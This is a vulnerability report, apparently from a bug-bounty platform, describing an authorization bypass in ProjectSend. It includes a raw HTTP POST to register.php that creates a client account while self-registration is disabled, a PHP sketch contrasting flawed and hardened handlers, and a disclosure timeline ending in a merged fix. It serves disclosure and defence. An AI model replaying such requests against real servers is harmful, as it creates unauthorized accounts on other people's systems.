Execution with Unnecessary Privileges in projectsend/projectsend

Valid

Reported on Jul 2nd 2021

💥 BUG

A client can be created even when self client registration is disabled.

💥 IMPACT

Any user can create a client even when self client registration is disabled.

💥 STEPS TO REPRODUCE

1. From the admin account, go to http://localhost/projectsend2/options.php?section=clients and disable client registration.
So, self client registration is not possible anymore.
2. Now from another browser, go to http://localhost/projectsend2/index.php; here you can see the message "This server does not allow self registrations."
Now get the csrf-token from this login page http://localhost/projectsend2/index.php and send the request below to register a client.

POST /projectsend2/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/projectsend2/register.php
Cookie: PHPSESSID=6vvp9v5o64e56lqj87duod7jm5
Upgrade-Insecure-Requests: 1

csrf_token=78cfe208f087a66cd28f28e000602caa3d2350a9258b8ddfd4cf113e0f6cad71&name=client4&username=client4&password=pahan12&email=client4%40localhost.com&address=sss&phone=

In this request's POST data, change the csrf_token parameter value to the CSRF value captured above, and this request will create a new client.

So, any external user can create a client even when client registration is disabled.
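
The class of bug in this report, sketched as an added example (not part of the original report and not ProjectSend source code): a setting that only controls whether the form is shown, next to a handler that enforces it before processing the POST. The function names, the settings array and the `clients_can_register` key are assumptions made for illustration.

```php
<?php
// Added illustration, not ProjectSend source. All names here are hypothetical.

// Constructed settings store; 'clients_can_register' is an assumed option name.
$settings = ['clients_can_register' => false];

// Flawed pattern: the setting only decides whether the form is rendered,
// so a hand-built POST still reaches the account-creation code.
function register_flawed(array $settings, string $method, array $post): array
{
    if ($method === 'GET') {
        return $settings['clients_can_register']
            ? [200, 'registration form']
            : [200, 'This server does not allow self registrations.'];
    }
    return [200, 'client created: ' . $post['username']];
}

// Hardened pattern: authorize the action before looking at the method or body.
function register_hardened(array $settings, string $method, array $post, string $sessionToken): array
{
    if (empty($settings['clients_can_register'])) {
        return [403, 'This server does not allow self registrations.'];
    }
    if ($method !== 'POST') {
        return [200, 'registration form'];
    }
    // A valid CSRF token shows where the request came from, not that the action is allowed.
    if (!hash_equals($sessionToken, (string) ($post['csrf_token'] ?? ''))) {
        return [400, 'invalid CSRF token'];
    }
    return [200, 'client created: ' . $post['username']];
}

// Constructed request mirroring the report: valid token, registration disabled.
$token = bin2hex(random_bytes(32));
$post  = ['csrf_token' => $token, 'username' => 'client4'];

[$code, $msg] = register_flawed($settings, 'POST', $post);
echo "flawed:   $code $msg\n";
[$code, $msg] = register_hardened($settings, 'POST', $post, $token);
echo "hardened: $code $msg\n";
```

A regression test for the fix can assert that a POST carrying a valid token is rejected and that no client row is created while the option is off.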

We have contacted a member of the projectsend team and are waiting to hear back 7 months ago
ranjit-git
2 months ago

Researcher


Hello, maintainer, can you please validate this report?

Ignacio Nelson validated this vulnerability 23 days ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Ignacio Nelson confirmed that a fix has been merged on 240d20 23 days ago
Ignacio Nelson has been awarded the fix bounty